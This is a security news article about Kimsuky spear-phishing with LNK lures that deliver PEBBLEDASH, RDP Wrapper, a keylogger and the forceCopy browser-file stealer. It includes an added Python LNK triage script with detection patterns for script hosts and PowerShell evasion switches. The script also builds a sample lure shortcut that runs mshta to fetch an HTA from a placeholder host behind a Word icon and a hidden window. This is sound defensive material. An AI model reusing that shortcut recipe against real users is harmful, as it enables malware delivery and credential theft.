Kimsuky Hackers Deploy forceCopy Malware in Spear-Phishing Attacks

North Korea-linked hacking group Kimsuky has been identified conducting targeted spear-phishing campaigns to distribute an information stealer known as forceCopy, according to the latest findings from the AhnLab Security Intelligence Center (ASEC).

The attacks begin with phishing emails carrying a Windows shortcut (LNK) file disguised as a Microsoft Office or PDF document. When the victim opens it, the shortcut launches PowerShell or mshta.exe, a legitimate Microsoft binary that runs HTML Application (HTA) files, which in turn downloads and executes additional malware from an external server.
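The lure described above leaves a recognisable footprint in the shortcut itself: the LNK's target or arguments name mshta.exe or PowerShell, the arguments carry a URL, the icon points at an Office or Reader binary, and the window is set to open minimised. The following static triage, added here as an illustration and not code from ASEC or from the malware, parses the Shell Link header and StringData fields (MS-SHLLINK layout) and flags those traits. The two sample shortcuts, the URL and the paths in them are constructed for the example, not indicators from the report.

```python
"""Static triage of a Windows shortcut (.lnk) for the document-themed
script-host lure described above. Added example; offsets follow MS-SHLLINK.
The two sample shortcuts are constructed inline so this runs offline."""
import re
import struct

HEADER_SIZE = 0x4C
LINK_CLSID = bytes.fromhex("0114020000000000c000000000000046")  # {00021401-0000-0000-C000-000000000046}

# LinkFlags bits that decide which optional structures follow the header
HAS_ID_LIST, HAS_LINK_INFO, IS_UNICODE = 0x01, 0x02, 0x80
STRING_FIELDS = [("name", 0x04), ("relative_path", 0x08), ("working_dir", 0x10),
                 ("arguments", 0x20), ("icon_location", 0x40)]   # on-disk order
SW_SHOWMINNOACTIVE = 7   # start minimised and never activate: hides the console

SCRIPT_HOSTS = re.compile(r"(?:^|\\)(?:mshta|powershell|pwsh|cmd|wscript|cscript|rundll32)(?:\.exe)?$", re.I)
DOC_ICONS = re.compile(r"(?:winword|excel|powerpnt|acrord32|acrobat)\.exe$|\.(?:docx?|xlsx?|pptx?|pdf)$", re.I)
REMOTE_URL = re.compile(r"https?://", re.I)
PS_EVASION = re.compile(r"-(?:enc|e|ep|nop|w)\b", re.I)   # -enc, -ep bypass, -w hidden, -nop


def parse_lnk(data: bytes) -> dict:
    """Return LinkFlags, ShowCommand and the StringData fields of a .lnk file.
    Raises ValueError (or struct.error) on malformed or truncated input."""
    if len(data) < HEADER_SIZE or struct.unpack_from("<I", data, 0)[0] != HEADER_SIZE \
            or data[4:20] != LINK_CLSID:
        raise ValueError("not a Shell Link file")
    flags = struct.unpack_from("<I", data, 20)[0]
    fields = {"flags": flags, "show_command": struct.unpack_from("<I", data, 60)[0]}
    pos = HEADER_SIZE
    if flags & HAS_ID_LIST:             # IDListSize (u16) followed by the IDList
        pos += 2 + struct.unpack_from("<H", data, pos)[0]
    if flags & HAS_LINK_INFO:           # LinkInfoSize counts its own four bytes
        pos += struct.unpack_from("<I", data, pos)[0]
    for name, bit in STRING_FIELDS:     # each: CountCharacters (u16) + chars, no terminator
        if not flags & bit:
            fields[name] = ""
            continue
        if pos + 2 > len(data):
            raise ValueError("truncated StringData")
        count = struct.unpack_from("<H", data, pos)[0]
        pos += 2
        width = 2 if flags & IS_UNICODE else 1
        raw = data[pos:pos + count * width]
        if len(raw) != count * width:
            raise ValueError("truncated StringData")
        fields[name] = raw.decode("utf-16-le" if width == 2 else "latin-1")
        pos += len(raw)
    return fields


def triage_lnk(data: bytes) -> list:
    """Return the reasons a shortcut looks like a script-host lure ([] if none)."""
    f = parse_lnk(data)
    reasons = []
    script_host = SCRIPT_HOSTS.search(f["relative_path"]) is not None
    if script_host:
        reasons.append("target is a script host: " + f["relative_path"])
    if REMOTE_URL.search(f["arguments"]):
        reasons.append("arguments reference a remote URL (stager download)")
    if PS_EVASION.search(f["arguments"]):
        reasons.append("PowerShell evasion switches in arguments")
    if script_host and DOC_ICONS.search(f["icon_location"]):
        reasons.append("document icon on a script-host target (icon spoofing)")
    if script_host and f["show_command"] == SW_SHOWMINNOACTIVE:
        reasons.append("window minimised and not activated to hide the console")
    return reasons


def build_lnk(relative_path, arguments="", icon_location="", show_command=1) -> bytes:
    """Construct a minimal Unicode .lnk (no IDList/LinkInfo) for offline testing."""
    flags, body = IS_UNICODE, b""
    values = {"relative_path": relative_path, "arguments": arguments, "icon_location": icon_location}
    for name, bit in STRING_FIELDS:
        value = values.get(name, "")
        if value:
            flags |= bit
            body += struct.pack("<H", len(value)) + value.encode("utf-16-le")
    header = (struct.pack("<I", HEADER_SIZE) + LINK_CLSID + struct.pack("<II", flags, 0)
              + b"\x00" * 24 + struct.pack("<IIIH", 0, 0, show_command, 0) + b"\x00" * 10)
    assert len(header) == HEADER_SIZE
    return header + body + b"\x00\x00\x00\x00"      # TerminalBlock closes ExtraData


# Constructed samples: placeholder URL and paths, not indicators from the report.
LURE_LNK = build_lnk(
    relative_path=r"..\..\..\Windows\System32\mshta.exe",
    arguments="https://example.invalid/quarterly-report.hta",
    icon_location=r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
    show_command=SW_SHOWMINNOACTIVE,
)
BENIGN_LNK = build_lnk(relative_path=r"..\Documents\Quarterly Report.docx")

if __name__ == "__main__":
    for label, blob in (("lure", LURE_LNK), ("benign", BENIGN_LNK)):
        print(label, parse_lnk(blob)["relative_path"], triage_lnk(blob) or "clean")
```

The checks are deliberately structural rather than signature-based: they key on what a shortcut must contain to do this job (a script-host target plus a remote argument) and on the disguise (document icon, hidden window), so they survive a change of hostname or filename. Real shortcuts usually also carry a LinkTargetIDList, which the parser skips by its declared size; run `triage_lnk` over the attachment bytes before they reach a user's desktop.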

According to ASEC, the attack chain ultimately delivers PEBBLEDASH, a known trojan, and a customized build of RDP Wrapper, an open-source utility that enables Remote Desktop on Windows editions that do not ship with it.

Additionally, the attackers utilize proxy malware, which enables them to maintain persistent Remote Desktop Protocol (RDP) communication with external networks.

Kimsuky has also been observed employing a PowerShell-based keylogger to capture keystrokes and a new stealer malware, forceCopy, designed to extract files from directories linked to web browsers.

"All of the paths where the malware is installed are web browser installation paths," ASEC noted. "It is assumed that the threat actor is attempting to bypass restrictions in a specific environment and steal the configuration files of the web browsers where credentials are stored."

The use of RDP Wrapper and proxy malware marks a strategic shift for Kimsuky, which has traditionally relied on custom backdoors for gaining control over compromised systems.

The APT group, also referred to as APT43, Black Banshee, Emerald Sleet, Sparkling Pisces, Springtail, TA427, and Velvet Chollima, is believed to be affiliated with North Korea’s Reconnaissance General Bureau (RGB), the country's primary foreign intelligence agency.

Kimsuky has been active since at least 2012, relying primarily on social engineering attacks designed to slip past email security controls. In December 2024, cybersecurity firm Genians reported that the group had been sending phishing emails from Russian email services to steal credentials.